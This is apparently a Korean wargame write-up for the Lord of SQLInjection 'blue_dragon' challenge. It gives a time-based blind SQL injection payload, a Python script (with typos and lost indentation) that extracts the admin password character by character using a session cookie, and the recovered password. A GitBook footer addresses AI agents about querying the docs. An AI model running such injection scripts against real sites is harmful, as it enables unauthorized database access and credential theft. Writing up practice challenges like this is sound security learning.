> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-blue_dragon.md).

# \[Lord Of SQLInjection] blue\_dragon

<figure><img src="https://blog.kakaocdn.net/dna/wWhyp/btsNBxCUTsT/AAAAAAAAAAAAAAAAAAAAAA4-OfIgopCcpL4L_pIPA8l4JeuasFSkVvKIanyZZRSp/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=2Yy2zNOFMlXCwbsqhpDc5fz9ILs%3D" alt="" height="371" width="726"><figcaption></figcaption></figure>

#### 문제 접근

\- preg\_match가 두 파트에 나눠서 위치함

\- 싱글쿼터는 입력에는 필터링이 적용 안 되지만, 결과를 출력할 때에 싱글쿼터에 필터링함

\- admin의 password를 알아야하는데, 싱글쿼터없이 admin의 pw를 확인할 수 있는 쿼리를 만들어보려다가 실패해서 그냥 time based sql injection를 이용하기로 했다.

\- No Hack이라는 결과가 나오더라도 조건이 참일때 지연시간이 남음

```
[도메인 값]?pw=' or if(id='admin' and length(pw)=any number, sleep(3), 1)%23
```

→ 비밀번호의 길이는 8

```
import requests
import time

url="https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2d63b
82984.php?"
cookie = dict(PHPSESSID="cvr4q0t61op02qkd6b7dp6a98e")

result=""

for i in range(1,9):
for j in range(33,127):
start=time.time()
query = "pw=' or if(id='admin' and ascii(substr(pw, {},1))=
{},sleep(3),1)%23".format(i,j)
URL = ur1+query
res = requests.get(URL, cookies=cookie)
end=time.time()
if end-start > 3:
result += chr(j)
print(chr(j))
```

```
[도메인 값]?pw=' or if(id='admin; and ord(substr(pw, index, 1))=any char,sleep(3), 1)%23
```

→ pw는 d948b8a0

<figure><img src="https://blog.kakaocdn.net/dna/6ctX8/btsNDqvPYjq/AAAAAAAAAAAAAAAAAAAAAEHFPp4ep3lLdN0Z1Bqj_7-6YRaWz_nMmjrY6xm2kA0u/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=OEWGGKbWrM3zOgsqRkEPXBdfC0g%3D" alt="" height="432" width="660"><figcaption></figcaption></figure>

&#x20;


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-blue_dragon.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.